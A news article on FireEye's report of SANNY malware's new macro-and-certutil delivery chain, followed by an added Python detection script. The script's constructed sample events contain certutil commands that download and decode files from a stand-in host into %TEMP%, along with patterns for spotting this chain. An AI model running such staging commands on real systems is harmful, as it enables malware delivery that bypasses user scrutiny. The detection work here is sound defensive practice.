Cybersecurity researchers from FireEye have posted a report to their blog detailing a new delivery method for SANNY malware. The SANNY threat was first tracked by FireEye in 2012, and it has since been used to collect the personal information of “English and Russian-language diplomatic victims,” as reported by ThreatPost.
In its original form, the malware reached victims alongside a Word document. When opened, the document dropped an executable file. Once running, the malware would scan for and harvest logins and passwords for e-mail and social media accounts.
The threat actors using SANNY, believed to be operating on the Korean peninsula, have updated the malware to use a multistage attack. Unlike its previous iterations, the updated SANNY can also infect systems running Windows 10 and bypass User Account Control (UAC), the mechanism that generates a pop-up informing users that a program is attempting to make changes to their computer.
How the Updated SANNY Malware Works
Like its predecessor, the initial attack still arrives via a Word document (written in either English or Cyrillic). This time, however, the malicious code is embedded in a macro in the document. The macro contains a text box; when activated, it executes a command from that text box and then immediately overwrites it to remove evidence of the command.
In Stage 1, the macro uses the certutil.exe command-line utility to download an encoded Batch (BAT) file, which the macro then decodes into the %TEMP% directory. In Stage 2, the BAT file downloads a Cabinet (CAB) file containing the malware along with other configuration files. The BAT file also scans the system for antivirus software; if any is found, the malware alters its installation accordingly. The remainder of the attack is then driven from the contents of these CAB files.
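The two-stage chain above leaves a recognisable trail in process-creation telemetry: an Office application spawning certutil.exe with download or decode arguments, followed by a batch file run from the Temp directory fetching a CAB archive. The following detection script is an added example and is not code from FireEye or from the original report; the event records are constructed, simplified Sysmon-style process-creation entries (the field names, the example.invalid URL and the file names are assumptions made for illustration), and the certutil switches used in the sample lines (-urlcache, -decode, -hashfile) are real certutil options.

```python
"""Detection logic for a SANNY-style delivery chain:
Office macro -> certutil.exe download/decode -> batch file in %TEMP% -> CAB fetch.

Events are constructed, simplified process-creation records (Sysmon Event ID 1 shape).
The field names used here are an assumption of this example, not a FireEye format.
"""
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed sample events; paths, URL and file names are hypothetical.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4120", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/a.txt "
                r"C:\Users\u\AppData\Local\Temp\a.txt",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_cmdline": r'"WINWORD.EXE" /n report.docx'},
    {"pid": "4131", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\Users\u\AppData\Local\Temp\a.txt "
                r"C:\Users\u\AppData\Local\Temp\a.bat",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_cmdline": r'"WINWORD.EXE" /n report.docx'},
    {"pid": "4150", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/p.cab "
                r"C:\Users\u\AppData\Local\Temp\p.cab",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\a.bat"},
    # Benign administrative use of certutil from an interactive shell: must not fire.
    {"pid": "5001", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\setup.exe SHA256",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r"cmd.exe"},
]

# A .bat launched from any ...\Temp\ directory (the %TEMP% drop location in Stage 1).
TEMP_BAT_RE = re.compile(r"\\temp\\[^\s\"]+\.bat\b", re.IGNORECASE)
# A CAB archive referenced on the command line (the Stage 2 payload container).
CAB_RE = re.compile(r"\.cab\b", re.IGNORECASE)
# certutil being used to fetch from a URL or to decode a file, rather than for PKI work.
CERTUTIL_FETCH_OR_DECODE_RE = re.compile(r"-(urlcache|decode)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_certutil(ev: Dict[str, str]) -> bool:
    """Stage 1 indicator: an Office process launches certutil to download or decode."""
    return (basename(ev["parent_image"]) in OFFICE_PARENTS
            and basename(ev["image"]) == "certutil.exe"
            and CERTUTIL_FETCH_OR_DECODE_RE.search(ev["cmdline"]) is not None)


def temp_bat_fetches_cab(ev: Dict[str, str]) -> bool:
    """Stage 2 indicator: a child of a Temp-directory batch file references a CAB file."""
    return (basename(ev["parent_image"]) == "cmd.exe"
            and TEMP_BAT_RE.search(ev["parent_cmdline"]) is not None
            and CAB_RE.search(ev["cmdline"]) is not None)


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run both rules over the events and return one hit per matching rule and process."""
    hits: List[Dict[str, str]] = []
    for ev in events:
        if office_spawns_certutil(ev):
            hits.append({"pid": ev["pid"], "rule": "office_spawns_certutil"})
        if temp_bat_fetches_cab(ev):
            hits.append({"pid": ev["pid"], "rule": "temp_bat_fetches_cab"})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The first rule fires on any Office-spawned certutil that downloads or decodes, regardless of file names, so it survives the attackers changing their URLs; the second rule keys on the structural fact that the payload container is fetched by a script running out of %TEMP%. The benign -hashfile event is included to show that plain certutil usage from an administrator's shell is not flagged.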
The researchers note that, apart from the delivery mechanism, the malware itself has not changed.
What makes the updated SANNY more of a threat is its multistage approach: because the payload is nested in several layers, each fetched and decoded at runtime, it is harder for analysts to reverse-engineer the chain and for defenders to build a complete detection for it.
The FireEye team says users can protect themselves from SANNY “by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.”